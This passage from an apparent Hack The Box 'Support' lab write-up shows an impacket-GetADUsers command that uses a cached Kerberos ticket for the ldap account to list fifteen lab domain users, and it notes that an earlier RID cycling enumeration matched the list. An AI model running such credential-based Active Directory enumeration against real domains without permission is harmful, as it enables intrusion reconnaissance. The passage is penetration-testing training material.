Username Extraction


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=ldap@dc.support.htb.ccache impacket-GetADUsers support.htb/ -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Getting machine hostname
[*] Querying DC for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
anderson.damian       anderson.damian@support.htb     2022-05-28 13:13:05.993295  <never>             
bardot.mary           bardot.mary@support.htb         2022-05-28 13:14:08.633925  <never>             
cromwell.gerard       cromwell.gerard@support.htb     2022-05-28 13:14:24.258920  <never>             
daughtler.mabel       daughtler.mabel@support.htb     2022-05-28 13:15:26.274558  <never>             
ford.victoria         ford.victoria@support.htb       2022-05-28 13:15:58.118301  <never>             
hernandez.stanley     hernandez.stanley@support.htb   2022-05-28 13:12:34.870818  <never>             
langley.lucy          langley.lucy@support.htb        2022-05-28 13:15:10.930801  <never>             
levine.leopoldo       levine.leopoldo@support.htb     2022-05-28 13:13:37.508924  <never>             
monroe.david          monroe.david@support.htb        2022-05-28 13:14:39.712058  <never>             
raven.clifton         raven.clifton@support.htb       2022-05-28 13:13:53.133921  <never>             
smith.rosario         smith.rosario@support.htb       2022-05-28 13:12:19.305799  <never>             
stoll.rachelle        stoll.rachelle@support.htb      2022-05-28 13:15:42.290214  <never>             
thomas.raphael        thomas.raphael@support.htb      2022-05-28 13:13:21.774558  <never>             
west.laura            west.laura@support.htb          2022-05-28 13:14:55.446424  <never>             
wilson.shelby         wilson.shelby@support.htb       2022-05-28 13:12:50.352678  <never>             

Extracting all the domain users using the TGT of the ldap account. It would appear that the username enumeration made with the RID Cycling attack earlier did not miss a single domain user.